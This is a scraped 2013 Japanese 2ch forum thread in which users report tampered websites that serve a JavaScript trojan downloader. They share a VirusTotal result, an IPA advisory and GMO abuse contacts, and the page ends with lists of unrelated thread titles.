329 : >>328 @-GI-Locnフォーム発射完了 Hgmoフォーム発射完了 /counter●php /washi/ ↑こりも
330 : セキュリティに関するニュースを淡々と伝えるスレ8 http://kohada.2ch.net/test/read.cgi/sec/1370942055/62 62 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2013/09/10(火) 13:52:22.39 IPA 独立行政法人 情報処理推進機構:ウェブサイト改ざん等のインシデントに対する注意喚起〜ウェブサイト改ざんが急激に増えています〜 http://www.ipa.go.jp/security/topics/alert20130906.html
331 : >>328 D~morizen/ 朝aguseで確認したところ ロリポップにリダイレクトされていました win-iwate●com/ 検出名:Trojan-Downloader.JS.Iframe.deu 今はaguseでは検出されませんが ウイルストータルによるスキャン結果 検出率:9/ 47 https://www.virustotal.com/ja/file/d564422f0fd81a0aeda330094cfcf026b9eea8c36c2a83ec5d74237dba6d3225/analysis/1378805082/ GMOに連絡&>>6 のフォームhttps://secure.gmo.jp/contact/ から発射したのですが GMOのアビューズの人がもっと効率の良い連絡先として下記を教えてくれました abuse@gmo.jp
332 : ベネッセのサイトにXSS脆弱性がある教えてあげないと→プロバイダにネット接続を止められる http://engawa.2ch.net/test/read.cgi/poverty/1378950516/ >>329 下記のGMOクラウド(gmocloud.)専用のフォームもしくは>>331 のabuse@gmo.jpでないと時間が掛かりそうですが、ひたすら待つのだー http://www.gmocloud.com/contact/ ↓ https://contact.gmocloud.com/form/contact/
333 : \(^o^)/オワタ
334 : >>332 Officeさんの件があったからダメだよなあ
335 :2013/09/14 ふっきっき
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
トレンドマイクロの販売管理費 (263)
ドクターアレック スアンチスパイウェア (203)
アンチウイルスソフト体験版で無料生活 Part22 (755)
最強のPCセキュリティーコンボ(フリー限定) Part3 (466)
っていうかなんていうか★★★ネット用語編★★★ (273)
Malwarebytes' Anti-Malware Part1 (556)
--log9.info------------------
BDとかHDDVDとか出たしそろそろ板の名前変えない? (123)
絶滅寸前!CD-RW専用スレ (163)
CD-RWって使い道あるの? (411)
俺が認める究極のCD-Rメディア さあ買い溜めだ! (117)
「国産」の安いメディア情報(DVD系) 48枚目 (276)
★★スピンドリル保存恐い…(´Д`)ブルブル★★ (923)
【超えられない壁】DVD-R Super-X 5臨終【3GB】 (440)
DVDデュプリケーター(多枚数ダビング機) (215)
データを半永久的に保存するための方法を考えよう (362)
/// おまいらのメディアの使い方教えれや /// (108)
最強のDVDドライブ決定戦 round1 (168)
【+RW】最後の聖戦【RAM】 (842)
懐かしいな・・・ (132)
PS3のバックアップを試みるスレ (131)
★★★SONYのCD-Rってどうよ★★ (341)
【PX-708A】プレク旧作DVDドライブスレ【PX-712A】 (786)
--log55.com------------------
£んこ
クレジットカードってどんな風に使ってる?
新コマンド /dogprqb実装について100匹目
バンドリ、ラブライブ、アイドルマスターとかの音ニメ好きな人いる?
ID加速中が欅坂メンバーに対し犯行声明
いい年して一人称が『僕』のやつwwwwwwwwwwwww
韓国旅客船事故は日本のせい64
夏のネ実ブラゲ部